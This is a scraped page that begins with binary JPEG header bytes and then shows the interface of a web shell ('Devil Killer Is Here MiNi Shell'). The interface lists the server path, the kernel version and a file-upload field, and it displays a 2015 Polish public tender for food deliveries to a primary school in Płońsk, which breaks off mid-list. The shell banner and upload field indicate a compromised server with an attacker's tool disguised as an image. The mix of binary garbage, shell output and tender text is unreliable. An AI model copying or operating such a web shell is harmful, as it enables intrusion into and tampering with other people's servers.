JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151123/170859-N-2015.html

<p class="kh_header"><b>Płońsk: Dostawa artykułów żywnościowych w 2016 r. dla Szkoły Podstawowej Nr 3 im. Stanisława Wyspiańskiego w Płońsku.</b><br>
<b>Numer ogłoszenia: 170859 - 2015; data zamieszczenia: 23.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 3 im Stanisława Wyspiańskiego , ul. Płocka 60, 09-100 Płońsk, woj. mazowieckie, tel. 23 662 21 63, faks 23 662 21 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sp3plonsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa - szkoła podstawowa...</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych w 2016 r. dla Szkoły Podstawowej Nr 3 im. Stanisława Wyspiańskiego w Płońsku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są sukcesywne dostawy artykułów żywnościowych w 2016r. dla  potrzeb Szkoły Podstawowej   Nr3 im. Stanisława Wyspiańskiego w Płońsku. Przedmiot zamówienia został podzielony na części  I - V, w tym:

CZĘŚĆ  I - MIĘSA
CZĘŚĆ   II -   JAJA 
CZĘŚĆ   III -   OWOCE I WARZYWA 
CZĘŚĆ  IV -   MROŻONKI 
CZĘŚĆ   V  -   RÓŻNE  ARTYKUŁY  ŻYWNOŚCIOWE   

2.	Szczegółowy wykaz i zakres wszystkich części zamówienia, oraz wymagania dotyczące realizacji dostaw zostały określone w Szczegółowym opisie przedmiotu zamówienia części I - V stanowiącym załącznik nr 1 do SIWZ.
3.	Podane ilości towaru są wielkościami szacunkowymi, służą wyłącznie do obliczenia ceny oferty. Zamawiający nie będzie zobowiązany do zakupu pełnego asortymentu w podanych ilościach.
4.	Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia ilości dostaw wg asortymentu podanego w ofercie w trakcie realizacji umowy - według własnych potrzeb do limitu posiadanych środków finansowych.
5.	Zamawiający wymaga, aby wykonawca ubiegający się o udzielenie zamówienia spełniał  wszelkie wymagania określone w ustawie z dnia 25  sierpnia 2006r. O bezpieczeństwie żywności i żywienia  (Dz. U. z 2010r Nr 136 poz. 914), oraz obowiązujących aktów wykonawczych wydanych na jej podstawie. 
6.	Wykonawca będzie zobowiązany do dostarczania zamawianych artykułów do siedziby zamawiającego na własny koszt i ryzyko, transportem przystosowanym do przewozu żywności oraz rozładunku towaru i złożenia go w miejscu wskazanym przez Zamawiającego w jego magazynach.
7.	Zamówienia na dostawy bieżące, zgodne z potrzebami Zamawiającego będą składane z min. jednodniowym wyprzedzeniem, telefonicznie, faksem lub w czasie dostawy na dostawę następną. Wykonawca musi wykazywać dyspozycyjność we wszystkie dni robocze od poniedziałku do piątku, a w uzasadnionych przypadkach na żądanie zamawiającego również w soboty.
8.	Wskazanie  w opisie przedmiotu zamówienia znaków towarowych, patentów lub pochodzenia uzasadnione jest specyfiką  przedmiotu zamówienia a wskazaniu takiemu towarzyszą wyrazy  lub równoważny. Wykonawca, który powoła się na rozwiązania równoważne opisanym przez zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez zamawiającego.
9.	Przedmiotem zamówienia w niniejszym postępowaniu są różne artykuły żywnościowe. Dla dostaw opisanych przez Zamawiającego standardy jakościowe nie są ustalane indywidualnie przez Zamawiającego na jego konkretne potrzeby, ale Zamawiający zaspokaja swoje potrzeby poprzez nabywanie towarów ogólnie dostępnych, powszechnie oferowanych, takich jakie są oferowane wszystkim, ewentualnie zainteresowanym ich zakupem. Różnią się tylko ceną nabycia. Dostawy powszechnie dostępne to takie, które jako dobra popularne są wszędzie na rynku oferowane i wykonywane przez wszystkich wykonawców działających w określonej branży. Można je nabywać bez względu na miejscowość i czas.    Zamawiający uwzględnił koszty ponoszone w całym okresie korzystania z przedmiotu zamówienia poprzez opisany sposób dostawy na koszt Wykonawcy,  wymagania dotyczące okresu przydatności do spożycia oferowanych produktów, gramaturę produktów, sposób pakowania, zastrzeżenie zmienności ilości zamawianych produktów a przede wszystkim niezmienność oferowanej  ceny w okresie realizacji umowy z zastrzeżeniem zmian ustawowych  wysokości obowiązującej stawki VAT oraz waloryzacji cen jednostkowych na podstawie wskaźnika ogłoszonego przez GUS..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 03.14.25.00-3, 03.22.20.00-3, 15.89.70.00-5, 15.22.10.00-3, 15.23.40.00-7, 15.20.00.00-2, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów (według wzoru - załącznik  nr 7 do siwz). - jeżeli dotyczy,
2)	jeżeli wykonawcę reprezentuje pełnomocnik -pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się zmiany w ilościach poszczególnych artykułów  spożywczych określonych w formularzach cenowych w przypadku zmniejszenia lub zwiększenia się liczby osób korzystających ze stołówki szkolnej.
2.	Zamawiający nie będzie zobowiązany do zakupu pełnego asortymentu w podanych ilościach.
3.	Zamawiający zastrzega sobie prawo do zwiększenia ilości dostaw wg asortymentu podanego w ofercie w trakcie realizacji umowy - według własnych potrzeb do limitu posiadanych środków finansowych.
4.	Zmiana wynagrodzenia Wykonawcy określona w oparciu o ceny jednostkowe produktów przedstawione  przez Wykonawcę w formularzach cenowych może ulec zmianie w przypadku ustawowej zmiany stawki podatku VAT. Wówczas wynagrodzenie należne Wykonawcy podlegać będzie automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującej w chwili powstania obowiązku podatkowego. 
5.	Dopuszcza się waloryzację cen jednostkowych netto według wskaźnika cen towarów i usług konsumpcyjnych dla żywności i napojów bezalkoholowych opublikowanego przez Główny Urząd Statystyczny w Biuletynie Statystycznym GUS.
6.	Na pisemny wniosek zainteresowanej strony cena jednostkowa może być waloryzowana w okresie obowiązywania umowy dwa razy w ciągu roku do wysokości wskaźnika wzrostu cen towarów i usług konsumpcyjnych  opublikowanego przez Główny Urząd Statystyczny na stronie internetowej www.stat.gov.pl. 
7.	Ceny jednostkowe produktów Wykonawca może obniżyć w każdym momencie obowiązywania umowy bez wymagalności zawierania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sp3plonsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 3 im. Staniaława Wyspiańskiego w Płońsku 09-100 Płońsk, ul. Płocka 60 - na pisemny wniosek Wykonawcy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2015 godzina 10:00, miejsce: Szkoła Podstawowa Nr 3 im. Staniaława Wyspiańskiego w Płońsku 09-100 Płońsk, ul. Płocka 60 - sekretariat szkoły..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ  I - MIĘSA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przewidywana częstotliwość dostaw :  codziennie  - nie później niż do godz. 8.00 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.  
3.	Szczegóły dotyczące ilości i asortymentu dostaw dziennych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty należy dostarczać w pojemnikach z materiałów dopuszczonych do kontaktu z żywnością, zamkniętych i oplombowanych w sposób uniemożliwiający ich otwarcie bez uszkodzenia plomb. Każdy asortyment produktów winien być dostarczony w oddzielnym pojemniku.
5.	Okres przydatności do spożycia dla mięsa winien wynosić nie mniej niż 5 dni od daty dostawy do magazynu Zamawiającego.  
6.	Okres przydatności do spożycia wędlin winien wynosić w dniu dostawy do magazynu zamawiającego nie mniej niż  9/10  gwarancji określonej przez producenta.
7.	Do każdego pojemnika powinna  być dołączona etykieta zawierająca co najmniej  następujące dane:
-  nazwę produktu,
-  termin przydatności do spożycia,
-  nazwę dostawcy - producenta, adres,
-  warunki przechowywania,
-  oznaczenie partii produkcyjnej,
-  oraz pozostałe informacje zgodne z aktualnie obowiązującymi przepisami 



lp.	opis przedmiotu zamówienia	Ilość

1.		Kiełbasa biała	200 kg
2.		Biodrówka	50 kg
3.		Boczek b/k	10 kg
4.		Golonka	10 kg
5.		Karkówka	400 kg
6.		Kości wp.	1300 kg
7.		Łopatka b/k	700 kg
8.		Mięso  wieprzowe mielone	800 kg
9.		Schab b/k	800 kg
10.		Słonina	200 kg
11.		Szynka b/k	300 kg
12.		Wołowe extra	10 kg
13.		Żeberka wp.	30 kg
14.		Pręga wołowa	10 kg
15.		Wątróbka drobiowa	50 kg
16.		Żołądki dr.	100 kg
17.		Filet z piersi kurczaka	400 kg
18.		Kurczaki	200 kg
19.		Kiełbasa cienka	100 kg
20.		Parówkowa	20 kg
21.		Korpus kurczaka ze skrzydłami	200 kg
22.		Ćwiartka kurczaka	300 kg
23.		Podudzie kurczaka	700 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ   II -   JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ   II -   JAJA  ( kod CPV- 03142500-3 jaja )

1.	Przewidywana częstotliwość dostaw  raz  w tygodniu .
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły, dotyczące ilości  dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na  bieżąco, według potrzeb Zamawiającego.
4.	Termin przydatności do spożycia nie krótszy niż 25 dni.

lp.	opis przedmiotu zamówienia	Ilość

1	Jaja  świeże - klasa XL	10 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ   III -   OWOCE I WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przewidywana częstotliwość dostaw:  :  codziennie od poniedziałku do piątku najpóźniej do godz. 8.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty muszą być świeże, I klasy, pierwszego gatunku, zgodne z obowiązującymi  normami.
l.p.	Opis przedmiotu zamówienia	Ilość 

1	Arbuz	200 kg
2	Banany	600 kg
3	Brokuły świeże	50 szt
4	Brzoskwinie	300 kg
5	Buraki	500 kg
6	Buraki suszone	30 szt
7	Cebula	600 kg
8	Cebula czerwona	10 kg
9	Cukinia	10 kg
10	Cykoria	10 kg
11	Cytryny	30 kg
12	Dynia	10 kg
13	Czereśnie	50 kg
14	Czosnek polski główka 	30 szt
15	Fasola  średnia  i gruba 	50 kg
16	Fasolka szparagowa 	100 kg
17	Figi	20 szt
18	Granat	30 szt
19	Grejfrut	100 kg
20	Gruszki	200 kg
21	Groch połówki	50 kg
22	Jabłka	2200 kg
23	Kalafior	300 szt
24	Kapusta biała	100 szt
25	Kapusta biała luz	100 szt
26	Kapusta czerwona	200 szt
27	Kapusta kwaszona	600 kg
28	Kapusta pekińska	500 kg
29	Kapusta włoska	100 kg
30	Kiwi	200 kg
31	Koper świeży pęczki	200 szt
32	Natka pęczki	800 szt
33	Kasza gryczana 	10 kg
34	Kasza jęczmienna	10 kg
35	Kokos	10 kg
36	Mandarynka	500 kg
37	Nektarynka	300 kg
38	Marchew	1600 kg
39	Ogórek zielony	300 kg
40	Ogórki kiszone	800 kg
41	Orzech włoski,laskowy	5 kg
42	Papryka świeża	200 kg
43	Pieczarka	400 kg
44	Pietruszka korzeń	20 kg
45	Pomarańcza	500 kg
46	Pomidor	400 kg
47	Pomidor koktajlowy	10 kg
48	Por	400 kg
49	Przecier ogórkowy	200 szt
50	Roszponka i rukola	10 szt
51	Rzodkiewka pęczek	300 szt
52	Rzodkiew biała i czarna	5 kg
53	Sałata	300 szt
54	Sałata lodowa	100 szt
55	Seler	400 kg
56	Szczypior pęczek	100 szt
57	Winogron	100 kg
58	Włoszczyzna susz	10 szt
59	Ziemniaki	12000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ  IV -   MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przewidywana częstotliwość dostaw raz w tygodniu do godz. 8.30 rano;
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia  nie krótszy niż ?  terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule.


Lp.	Opis przedmiotu zamówienia	Ilość 
1	Ryba miruna tusze	100 kg
2	Filet z mintaja	100 kg
3	Łosoś wędzony 100g	10 kg
4	Makrela wędzona 3 kg	10 kg
5	Kaszuby 3kg	10 kg
6	Śledzie wiejskie 3kg	10 kg
7	Kluski leniwe 450g	10 kg
8	Kluski śląskie 450g	10 kg
9	Kopytka 450g	10 kg
10	Pierogi ruskie 450g	10 kg
